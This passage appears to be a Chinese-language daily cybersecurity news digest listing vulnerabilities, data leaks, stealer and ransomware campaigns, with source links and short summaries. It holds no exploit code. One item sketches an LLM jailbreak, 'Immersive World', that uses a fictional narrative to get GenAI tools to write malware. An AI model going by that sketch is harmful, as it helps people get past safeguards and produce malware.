https://www.freebuf.com/articles/web/425480.html Cloudflare宣布已关闭所有HTTP连接,现在仅接受通过HTTPS加密的安全连接访问api.cloudflare.com。这一举措旨在防止未加密的API请求被发送,即使是意外发送,从而消除敏感信息在明文流量中暴露的风险。Cloudflare在周四的公告中表示:“从今天起,任何未加密的api.cloudflare.com连接都将被完全拒绝。”该公司进一步解释道:“开发者不应再期望HTTP连接会收到403 Forbidden响应,因为我们将通过完全关闭HTTP接口来阻止底层连接的建立。只有安全
7、微软可信签名服务遭滥用,恶意软件借机获得合法签名
https://www.freebuf.com/news/425460.html 网络犯罪分子正在滥用微软可信签名平台,通过有效期仅三天的短期证书为恶意软件可执行程序进行代码签名。长期以来,威胁行为者一直觊觎代码签名证书,因为这类证书可用于为恶意软件披上合法企业的外衣。
8、零日漏洞经纪公司Operation Zero悬赏400万美元收购Telegram漏洞
https://www.freebuf.com/vuls/425445.html 俄罗斯零日漏洞经纪公司Operation Zero正在寻找流行通讯应用Telegram的漏洞,并为此悬赏高达400万美元。俄罗斯零日漏洞经纪公司Operation Zero正在悬赏高达400万美元收购Telegram的漏洞,这一消息最初由Tech Crunch报道。该公司为一键远程代码执行(RCE)漏洞提供高达50万美元的赏金,为零点击RCE漏洞提供50万美元,而为能够完全控制设备的全链漏洞提供高达400万美元的赏金。
9、安卓设备被Root后遭遇攻击的风险激增3000倍
https://www.zimperium.com/blog/catch-me-if-you-can-rooting-tools-vs-the-mobile-security-industry/ Zimperium的一份报告警告称,被Root或越狱的手机仍然是企业面临的主要风险,其中安卓设备被Root后遭遇攻击的风险激增3000倍,因为这些设备更容易成为恶意软件和系统入侵的目标。
10、CISA发布五份工控系统安全公告,涵盖漏洞与利用
https://cybersecuritynews.com/cisa-releases-five-industrial-control-systems/ 美国网络安全和基础设施安全局(CISA)于2025年3月20日发布了五份工业控制系统(ICS)安全公告,提供了影响多家供应商工控系统的安全漏洞的关键信息。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月24日
1、研究人员发现恶意的VSCode扩展
https://www.bleepingcomputer.com/news/security/vscode-extensions-found-downloading-early-stage-ransomware/ 研究人员发现两款恶意的VSCode扩展,分别是“ahban.shiba”和“ahban.cychelloworld”。这两款扩展分别于2024年10月27日、2025年2月17日上传到VSCode平台,绕过了安全审查并存在了很长时间。研究人员发现这两款扩展包含PowerShell命令,该命令会从托管在Amazon AWS的远程服务器中下载并植入勒索软件,该勒索软件目前仅加密特定文件
2、Veeam修复其软件中的远程代码执行漏洞
https://www.bleepingcomputer.com/news/security/veeam-rce-bug-lets-domain-users-hack-backup-servers-patch-now/ Veeam已修复其Backup&Replication软件中一个被标识为CVE-2025-23120的远程代码执行漏洞,该公司已在发布的12.3.1版本(build 12.3.1.1139)中修复了该漏洞。该问题源于类中的反序列化漏洞,反序列化漏洞是指应用程序不正确地处理序列化数据,从而允许攻击者注入恶意对象并执行恶意代码。虽然目前还没有关于该漏洞被恶意利用的报告,但研究人员
3、收藏品交易平台Collectibles暴露近90万客户信息
https://cybernews.com/security/collectibles-marketplace-data-leak-trading-cards/ 收藏品交易平台Collectibles.com暴露近90万客户的敏感信息,涉及客户的卡牌清单、交易记录、全名和其他敏感信息。研究团队发现了一个属于Collectibles.com(也称为Cardbase)的Elasticsearch集群,暴露的数据库中包含近300GB的数据,包括全名、电子邮件地址、个人资料图片链接、其他用户帐户详细信息、收藏卡销售信息、交易数据。该数据库暴露了十多天,虽然没有证据表明攻击者访问了这些数据,但攻击者有
4、攻击者在Reddit传播AMOS和Lumma窃密木马
https://www.malwarebytes.com/blog/scams/2025/03/amos-and-lumma-stealers-actively-spread-to-reddit-users 研究人员称有攻击者通过Reddit帖子传播针对Mac和Windows系统的窃密木马,其目标是加密货币交易的用户。其中一种常见的诱饵文件是伪装成流行交易平台TradingView的虚假程序。攻击者发布虚假安装程序的链接,这些安装程序中被植入了Lumma Stealer或Atomic Stealer(AMOS)这两种窃密木马。
5、IBM修复AIX中的两个远程代码执行漏洞
https://securityonline.info/ibm-aix-security-breach-cve-2024-56346-cvss-10-cve-2024-56347-explained IBM发布了一份安全公告,详细介绍了AIX中的安全漏洞,这些漏洞可能允许远程攻击者执行任意命令,这两个漏洞分别是CVE-2024-56346(CVSS评分为10)和CVE-2024-56347(CVSS评分为9.6)。CVE-2024-56346存在于IBM AIX nimesis NIM主服务中,CVE-2024-56347 影响IBM AIX nimsh服务。由于不正确的进程控制,这两个漏洞
6、WordPress安全插件WP Ghost中存在远程代码执行漏洞
https://www.bleepingcomputer.com/news/security/wordpress-security-plugin-wp-ghost-vulnerable-to-remote-code-execution-bug/ 流行的WordPress安全插件WP Ghost中存在一个安全漏洞,该漏洞可能允许未经身份验证的攻击者远程执行代码并劫持服务器。该漏洞被标识为CVE-2025-26909(CVSS 评分9.6),影响WP Ghost 5.4.01及更早版本。该漏洞源于"showFile()"函数中输入验证不足,利用该漏洞可能允许攻击者完全接管网站。WP Ghost开
7、流行Java框架Spring修复两个安全漏洞
https://securityonline.info/spring-security-updates-address-authorization-bypass-and-password-length-vulnerabilities/ Spring是一个广泛用于基于Java应用程序的框架,披露了两个可能导致授权绕过和弱密码强制执行的安全漏洞。这两个漏洞分别是CVE-2025-22223和CVE-2025-22228,影响Spring Security的多个版本。Spring建议开发人员升级到已修复的版本,以降低被攻击的风险。
8、Keenetic证实用户数据遭到泄露
https://cybernews.com/security/keenetic-router-data-leak-puts-users-at-risk/ Keenetic路由器用户遭遇数据泄露事件,敏感凭据、设备详情、网络配置和日志等信息遭到泄露。研究人员收到了匿名电子邮件所发送的泄露数据样本。研究人员证实,泄露内容包括从WiFi密码和路由器配置到详细服务日志的所有内容。Keenetic估计此次事件产生的风险较低,可被访问的数据库字段数量有限,并且该公司不收集、存储或分析支付卡详细信息或相关凭据、交易数据、银行详细信息或银行密码,因此此类数据不受影响。
9、Coinbase成为近期GitHub Actions供应链攻击的主要目标
https://www.freebuf.com/articles/es/425442.html 研究人员发现,Coinbase是近期GitHub Actions供应链攻击的主要目标,该攻击导致数百个代码库中的机密信息泄露。
10、六国政府疑似使用以色列Paragon间谍软件窃取即时通讯数据
https://www.freebuf.com/news/425217.html 根据加拿大公民实验室(The Citizen Lab)的最新报告,澳大利亚、加拿大、塞浦路斯、丹麦、以色列和新加坡六国政府疑似成为以色列公司Paragon Solutions开发的间谍软件的客户。该间谍软件名为Graphite,能够从设备上的即时通讯应用程序中窃取敏感数据。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年03月21日
1、研究人员发现一种名为Arcane的新型窃密木马
https://securelist.com/arcane-stealer/115919/ 研究人员发现,攻击者正在使用一种名为Arcane的新型窃密木马窃取广泛的用户数据,包括VPN账号凭据、游戏客户端、消息应用程序以及存储在网络浏览器中的信息。与Arcane相关的恶意软件活动始于2024年11月,其背后攻击者的所有对话和公开帖子均使用俄语。研究人员观测到的数据显示,大多数Arcane攻击活动发生在俄罗斯、白俄罗斯和哈萨克斯坦。
2、宾夕法尼亚州教育协会证实超过50万人的数据遭到泄露
https://www.bleepingcomputer.com/news/security/pennsylvania-education-union-data-breach-hit-500-000-people/ 宾夕法尼亚州教育协会(PSEA)正在通知超过50万人,攻击者在2024年7月的安全事件中窃取了他们的个人信息。PSEA表示,泄露的信息因人而异,涉及个人、财务和健康数据,包括驾驶执照或州身份证、社会安全号码、账户密码、安全码、支付卡信息、护照信息、纳税人识别号、凭证、健康保险和医疗信息。虽然PSEA没有确认此次攻击的攻击者,但Rhysida勒索组织于2024年9月9日声称对此攻击
3、Qilin勒索组织声称攻击了SMC欧洲公司
https://www.csoonline.com/article/3849350/ransomware-attacke-auf-smc-europa.html 据称,自动化机械设备制造公司SMC遭受了勒索软件攻击。Qilin勒索组织最近在其网站上发布了一个帖子,声称他们已经从SMC的欧洲子公司窃取了大约1TB的数据。攻击者声称窃取的数据包括:执行器、控制阀和支持物联网的工业组件的技术设计图;包含个人身份信息(PII)、工资单数据和绩效文件的员工档案;与整个欧盟的汽车和航空制造商签订的供应链合同。SMC欧洲公司目前尚未对此事件发表官方声明。
4、攻击者声称出售佳能公司内部防火墙的管理员级访问权限
https://cybersecuritynews.com/hackers-allegedly-selling-firewall-access-to-canon/ 攻击者正在黑客论坛上出售对佳能公司内部防火墙系统的管理员级别的访问权限。该攻击者发帖宣称拥有佳能内部网络的特权访问权限,并提供该公司防火墙系统的root/管理员凭据。通过对防火墙基础设施的root访问权限,攻击者可能能够建立持久的后门、在网络中进行横向移动,或者可能发起勒索软件攻击。佳能尚未公开确认此次事件是否属实。
5、Cisco智能许可工具漏洞遭攻击者利用,内置后门账户曝光
https://www.freebuf.com/vuls/425266.html 近期,攻击者开始针对未修复漏洞的Cisco智能许可工具(Cisco Smart Licensing Utility, CSLU)实例发起攻击,该漏洞暴露了一个内置的后门管理员账户。Cisco智能许可工具是一款Windows应用程序,允许管理员在本地环境中管理许可证和关联产品,而无需将其连接到Cisco基于云的Smart Software Manager解决方案。
6、研究人员利用AI越狱技术大量窃取Chrome信息
https://www.freebuf.com/news/425121.html Cato Networks作为一家安全访问服务边缘(SASE)解决方案提供商,近日发布了其《2025年Cato CTRL威胁报告》,揭示了一项重要发现。研究人员称,他们成功设计了一种技术,使毫无编程经验的个人也能够利用现成的生成式AI(GenAI)工具创建恶意软件。该研究的核心是一项名为“沉浸式世界”(Immersive World)的新型大语言模型(LLM)越狱技术,由Cato CTRL威胁情报研究员开发。该技术通过构建一个详细的虚构叙事环境,为包括DeepSeek、Microsoft Copilot和Ope
7、黑客利用PHP严重漏洞部署Quasar RAT和XMRig挖矿软件
https://www.freebuf.com/vuls/425125.html 黑客正在利用PHP中的一个严重安全漏洞来传播加密货币挖矿软件和远程访问木马(RAT),例如Quasar RAT。该漏洞被分配了CVE标识符CVE-2024-4577,涉及PHP在基于Windows的系统上以CGI模式运行时的一个参数注入漏洞,可能导致远程攻击者执行任意代码。
8、Kali Linux 2025.1a 发布:新增工具、年度主题更新
https://www.freebuf.com/sectool/425131.html Kali Linux 发布了2025年的首个版本 2025.1a,本次更新新增了一个工具,并对桌面和主题进行了调整。
9、重大漏洞警示:AMI BMC漏洞可能导致远程认证绕过
https://www.freebuf.com/vuls/425160.html 安全研究人员近期发现,AMI的MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证。这一漏洞编号为CVE-2024-54085,已影响众多数据中心设备和服务器型号,可能危及全球多家组织的云基础设施安全。
10、Synology 严重漏洞可致攻击者远程执行任意代码
https://www.anquanke.com/post/id/305232 Synology 的DiskStation Manager(简称 DSM)存在一个严重漏洞,远程攻击者无需用户交互即可执行任意代码。这个在 2024 年 PWN2OWN 大会期间披露的漏洞被评定为严重级别,通用漏洞评分系统(CVSS)评分为 9.8,这表明它极有可能被广泛利用。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

